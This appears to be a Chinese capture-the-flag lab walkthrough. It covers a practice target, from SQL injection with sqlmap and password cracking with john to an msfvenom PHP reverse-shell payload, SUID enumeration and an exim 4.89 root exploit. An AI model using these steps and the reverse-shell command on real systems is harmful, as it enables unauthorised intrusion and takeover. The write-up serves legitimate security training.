确定靶机IP地址
扫描靶机的开放端口,发现靶机开放端口有80、22
访问80端口
扫描网站的目录
发现敏感目录user
访问user目录,发现是登陆界面
使用工具查看网站的CMS
发现网站的nid会变化试一试会不会有sql注入漏洞
加个单引号发现出现报错信息,说明存在sql注入漏洞
使用sqlmap爆库
通过库名爆表
找到想要的users表,通过表名爆列
找到想要的列
知道这两个列后爆破出这两列的数据,爆破后得到用户名和加密的密码
将两列的账号密码保存到一个文件,格式如下,使用john进行爆破。
爆破出了一个密码
User:john
Passwd:turtle
访问刚才扫描到的登录界面user登录
找到写入点
利用msf生成一段payload,这里的IP地址要写攻击机的IP
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.50.139 lport=8888 -f raw
将生成的payload复制上去,保存提交
开启监听
用提交邮件的方式来触发
连接成功
查看系统的版本信息,用户信息、内核信息,发现并没有可以利用的
利用命令查找suid权限的程序
find / -user root -perm -4000 -print 2>/dev/null
利用exim4,查询exim4的版本,版本是4.89
用searchsploit查询exim的可漏洞
复制脚本文件到当前目录
将脚本下载到靶机上之后发现运行不了,原因是这个脚本的格式是dos,要修改为unix格式才行
先在kali上修改这个文件的格式,再临时开启kali的http服务,使靶机可以在kali上将文件下载下来
修改格式
临时开启kali的http服务
在靶机上将文件下载下来,下载到/tmp目录下,当前目录下载会失败
执行脚本,发现执行失败,查看发现没有执行权限,为文件赋予执行权
再次执行脚本发现这个反弹shell不稳定总是掉,或者根本连不上
使用这个方法执行,提权成功,得到root权限
Flag就在/root目录下
再次查看发现已经掉线,这个shell并不稳定